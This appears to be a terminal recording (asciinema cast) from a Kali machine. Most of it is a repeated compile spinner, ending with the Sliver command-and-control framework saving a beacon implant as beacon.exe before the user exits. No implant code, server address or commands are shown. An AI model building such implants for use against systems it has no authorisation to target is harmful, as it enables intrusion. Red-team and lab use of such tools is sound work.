[81.532654, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[81.633064, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[81.733472, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[81.833862, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[81.934255, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[82.034553, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[82.134968, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[82.235346, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[82.335759, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[82.436139, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[82.53654, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[82.636935, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[82.737336, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[82.837748, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[82.938161, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[83.038546, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[83.13896, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[83.239353, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[83.339739, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[83.440079, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[83.54049, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[83.640888, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[83.741261, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[83.841697, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[83.942096, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[84.042504, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[84.14291, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[84.243294, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[84.343901, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[84.444263, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[84.544642, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[84.64505, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[84.745433, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[84.845815, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[84.946247, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[85.046639, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[85.147039, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[85.247435, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[85.347883, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[85.448251, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[85.548654, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[85.649046, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[85.749462, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[85.849853, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[85.950254, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[86.050666, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[86.15108, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[86.251468, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[86.351903, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[86.452325, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[86.55273, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[86.653159, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[86.753583, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[86.853992, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[86.954401, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[87.054817, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[87.15522, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[87.255618, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[87.356042, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[87.456465, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[87.556878, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[87.657163, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[87.757583, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[87.857998, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[87.958412, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[88.058827, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[88.159249, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[88.25968, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[88.360075, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[88.460515, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[88.560923, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[88.661328, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[88.761739, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[88.862144, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[88.962567, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[89.062994, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[89.163422, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[89.263874, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[89.364274, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[89.464691, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[89.565083, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[89.665512, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[89.765902, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[89.866299, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[89.966717, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[90.067109, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[90.167535, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[90.267978, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[90.36839, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[90.468788, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[90.569179, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[90.669594, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[90.769978, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[90.87036, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[90.970752, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[91.071155, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[91.171573, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[91.271982, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[91.372391, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[91.472816, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[91.573206, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[91.67361, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[91.774046, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[91.874466, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[91.974861, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[92.075252, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[92.175644, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[92.276061, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[92.376535, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[92.476932, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[92.577342, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[92.677712, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[92.778109, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[92.878516, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[92.97892, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[93.079343, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[93.179764, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[93.280186, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[93.380592, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[93.480997, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[93.581411, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[93.681811, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[93.782218, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[93.882638, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[93.983044, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[94.083439, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[94.183863, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[94.284275, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[94.384703, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[94.485188, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[94.585644, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[94.686046, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[94.786429, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[94.886842, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[94.987291, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[95.087728, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[95.188065, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[95.288423, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[95.388823, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[95.489225, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[95.589663, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[95.690088, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[95.790472, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[95.890891, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[95.991311, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[96.091792, "o", "\r\u001b[2K ⠧  Compiling, please wait ..."]
[96.192298, "o", "\r\u001b[2K ⠇  Compiling, please wait ..."]
[96.292733, "o", "\r\u001b[2K ⠏  Compiling, please wait ..."]
[96.39317, "o", "\r\u001b[2K ⠋  Compiling, please wait ..."]
[96.493548, "o", "\r\u001b[2K ⠙  Compiling, please wait ..."]
[96.594032, "o", "\r\u001b[2K ⠹  Compiling, please wait ..."]
[96.69446, "o", "\r\u001b[2K ⠸  Compiling, please wait ..."]
[96.794901, "o", "\r\u001b[2K ⠼  Compiling, please wait ..."]
[96.89533, "o", "\r\u001b[2K ⠴  Compiling, please wait ..."]
[96.995767, "o", "\r\u001b[2K ⠦  Compiling, please wait ..."]
[97.072858, "o", "\r\u001b[2K"]
[97.073391, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mBuild completed in 1m21s\r\n"]
[97.105542, "o", "\r\u001b[2K\u001b[1m\u001b[36m[*] \u001b[0mImplant saved to /home/kali/beacon.exe\r\n\r\n"]
[97.105801, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0m \b"]
[102.528753, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0me"]
[102.796622, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mex"]
[102.829259, "o", "\u001b[J\u001b[2K\r\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mexi"]
[102.942614, "o", "\u001b[J\u001b[2K\r"]
[102.942731, "o", "\u001b[m\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[0mexit"]
[104.18718, "o", "\u001b[?2004l\r\r\n"]
